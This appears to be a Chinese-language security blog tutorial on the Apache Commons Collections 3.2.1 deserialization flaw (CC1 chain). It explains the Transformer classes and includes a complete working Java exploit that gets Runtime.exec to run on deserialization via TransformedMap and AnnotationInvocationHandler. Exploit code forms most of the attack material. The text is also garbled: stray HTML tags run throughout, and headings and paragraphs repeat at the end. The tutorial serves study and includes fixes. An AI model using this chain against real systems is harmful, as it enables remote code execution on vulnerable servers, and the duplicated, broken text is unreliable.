Apache Commons Collections反序列化漏洞分析(CC链1)<\/h1>

1. 漏洞背景<\/h2>
Apache Commons Collections是一个广泛使用的Java工具库，提供了许多强大的集合类和相关工具。其中存在一个严重的安全漏洞，攻击者可以通过构造特殊的序列化数据，在反序列化时执行任意代码。<\/p>

2. 环境搭建<\/h2>

2.1 所需组件<\/h3>

JDK 8u66（高版本已修复漏洞）<\/li>

Commons Collections <= 3.2.1<\/li> <\/ul>

2.2 配置步骤<\/h3>

下载JDK 8u66和OpenJDK源码<\/li>
将OpenJDK源码中的sun<\/code>文件夹复制到JDK的src<\/code>目录<\/li>
在IDEA中配置JDK的src目录到类路径和源路径<\/li>

创建Maven项目并添加依赖：<\/li>
<\/ol>
<dependencies><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>commons-collections<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>commons-collections<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>3.2.1<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span><\/dependencies><\/span>
<\/span><\/span><\/code><\/pre>3. 关键类分析<\/h2>
3.1 Transformer接口<\/h3>
public<\/span> interface<\/span> Transformer<\/span> {<\/span>
<\/span><\/span>    public<\/span> Object transform<\/span>(<\/span>Object input);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>该接口用于对象转换，关键实现类包括：<\/p>

ConstantTransformer<\/li>
InvokerTransformer<\/li>
ChainedTransformer<\/li>
<\/ul>
3.2 ConstantTransformer类<\/h3>
public<\/span> class<\/span> ConstantTransformer<\/span> implements<\/span> Transformer {<\/span>
<\/span><\/span>    public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span>
<\/span><\/span>        return<\/span> iConstant;<\/span> \/\/ 无论输入什么，都返回构造时传入的对象
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.3 InvokerTransformer类<\/h3>
public<\/span> class<\/span> InvokerTransformer<\/span> implements<\/span> Transformer {<\/span>
<\/span><\/span>    public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span>
<\/span><\/span>        Class cls =<\/span> input.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>        Method method =<\/span> cls.<\/span>getMethod<\/span>(<\/span>iMethodName,<\/span> iParamTypes);<\/span>
<\/span><\/span>        return<\/span> method.<\/span>invoke<\/span>(<\/span>input,<\/span> iArgs);<\/span> \/\/ 通过反射调用指定方法
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.4 ChainedTransformer类<\/h3>
public<\/span> class<\/span> ChainedTransformer<\/span> implements<\/span> Transformer {<\/span>
<\/span><\/span>    public<\/span> Object transform<\/span>(<\/span>Object object)<\/span> {<\/span>
<\/span><\/span>        for<\/span> (<\/span>Transformer transformer :<\/span> iTransformers)<\/span> {<\/span>
<\/span><\/span>            object =<\/span> transformer.<\/span>transform<\/span>(<\/span>object);<\/span> \/\/ 链式调用多个Transformer
<\/span><\/span><\/span><\/span>        }<\/span>
<\/span><\/span>        return<\/span> object;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4. 漏洞利用链分析<\/h2>
4.1 核心利用代码<\/h3>
Runtime.<\/span>class<\/span>.<\/span>getMethod<\/span>(<\/span>"getRuntime"<\/span>).<\/span>invoke<\/span>(<\/span>null<\/span>)).<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>4.2 使用Transformer实现<\/h3>
Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>null<\/span>,<\/span> new<\/span> Object[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>ChainedTransformer transformerChain =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span><\/code><\/pre>4.3 触发点分析<\/h3>

TransformedMap.checkSetValue()<\/strong>
protected<\/span> Object checkSetValue<\/span>(<\/span>Object value)<\/span> {<\/span>
<\/span><\/span>    return<\/span> valueTransformer.<\/span>transform<\/span>(<\/span>value);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>
AbstractInputCheckedMapDecorator.setValue()<\/strong>
public<\/span> Object setValue<\/span>(<\/span>Object value)<\/span> {<\/span>
<\/span><\/span>    value =<\/span> parent.<\/span>checkSetValue<\/span>(<\/span>value);<\/span>
<\/span><\/span>    return<\/span> entry.<\/span>setValue<\/span>(<\/span>value);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>
AnnotationInvocationHandler.readObject()<\/strong>
private<\/span> void<\/span> readObject<\/span>(<\/span>ObjectInputStream s)<\/span> {<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    memberValue.<\/span>setValue<\/span>(...);<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
5. 完整利用链构造<\/h2>
5.1 构造TransformedMap<\/h3>
HashMap<<\/span>Object,<\/span>Object><\/span> map =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>map.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span> "b"<\/span>);<\/span> \/\/ 必须包含"value"键
<\/span><\/span><\/span><\/span>Map<<\/span>Object,<\/span>Object><\/span> transformedMap =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>map,<\/span> null<\/span>,<\/span> transformerChain);<\/span>
<\/span><\/span><\/code><\/pre>5.2 构造AnnotationInvocationHandler<\/h3>
Class c =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>Constructor constructor =<\/span> c.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span>
<\/span><\/span>constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Object o =<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> transformedMap);<\/span>
<\/span><\/span><\/code><\/pre>5.3 序列化与反序列化<\/h3>
\/\/ 序列化
<\/span><\/span><\/span><\/span>ObjectOutputStream out =<\/span> new<\/span> ObjectOutputStream(...);<\/span>
<\/span><\/span>out.<\/span>writeObject<\/span>(<\/span>o);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 反序列化触发漏洞
<\/span><\/span><\/span><\/span>ObjectInputStream in =<\/span> new<\/span> ObjectInputStream(...);<\/span>
<\/span><\/span>in.<\/span>readObject<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>6. 完整EXP代码<\/h2>
import<\/span> org.apache.commons.collections.Transformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.functors.*;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.map.TransformedMap;<\/span>
<\/span><\/span>import<\/span> java.io.*;<\/span>
<\/span><\/span>import<\/span> java.lang.annotation.Target;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Constructor;<\/span>
<\/span><\/span>import<\/span> java.util.HashMap;<\/span>
<\/span><\/span>import<\/span> java.util.Map;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Serialcc<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>            new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>                new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>                new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>                new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>                new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>                new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>                new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span>
<\/span><\/span>        };<\/span>
<\/span><\/span>        
<\/span><\/span>        ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>        HashMap<<\/span>Object,<\/span>Object><\/span> hash =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>        hash.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span> 'b'<\/span>);<\/span>
<\/span><\/span>        Map<<\/span>Object,<\/span>Object><\/span> decorate =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>hash,<\/span> null<\/span>,<\/span> chainedTransformer);<\/span>
<\/span><\/span>        
<\/span><\/span>        Class c =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>        Constructor constructor =<\/span> c.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span>
<\/span><\/span>        constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        Object o =<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> decorate);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 序列化
<\/span><\/span><\/span><\/span>        ObjectOutputStream out =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"1.bin"<\/span>));<\/span>
<\/span><\/span>        out.<\/span>writeObject<\/span>(<\/span>o);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 反序列化触发
<\/span><\/span><\/span><\/span>        ObjectInputStream in =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>"1.bin"<\/span>));<\/span>
<\/span><\/span>        in.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>7. 漏洞修复<\/h2>

升级到Commons Collections 3.2.2或更高版本<\/li>
使用安全框架限制反序列化<\/li>
使用Java安全管理器限制权限<\/li>
<\/ol>
8. 学习建议<\/h2>

深入理解Java反射机制<\/li>
掌握Java序列化与反序列化原理<\/li>
学习其他反序列化漏洞利用链<\/li>
研究安全防护措施和绕过方法<\/li>
<\/ol>

Apache Commons Collections反序列化漏洞分析(CC链1)<\/h1>

1. 漏洞背景<\/h2> Apache Commons Collections是一个广泛使用的Java工具库，提供了许多强大的集合类和相关工具。其中存在一个严重的安全漏洞，攻击者可以通过构造特殊的序列化数据，在反序列化时执行任意代码。<\/p>

2. 环境搭建<\/h2>

3. 关键类分析<\/h2>

4. 漏洞利用链分析<\/h2>

5. 完整利用链构造<\/h2>

8. 学习建议<\/h2> 深入理解Java反射机制<\/li> 掌握Java序列化与反序列化原理<\/li> 学习其他反序列化漏洞利用链<\/li> 研究安全防护措施和绕过方法<\/li> <\/ol>

1. 漏洞背景<\/h2>
Apache Commons Collections是一个广泛使用的Java工具库，提供了许多强大的集合类和相关工具。其中存在一个严重的安全漏洞，攻击者可以通过构造特殊的序列化数据，在反序列化时执行任意代码。<\/p>

8. 学习建议<\/h2>

深入理解Java反射机制<\/li>
掌握Java序列化与反序列化原理<\/li>
学习其他反序列化漏洞利用链<\/li>
研究安全防护措施和绕过方法<\/li> <\/ol>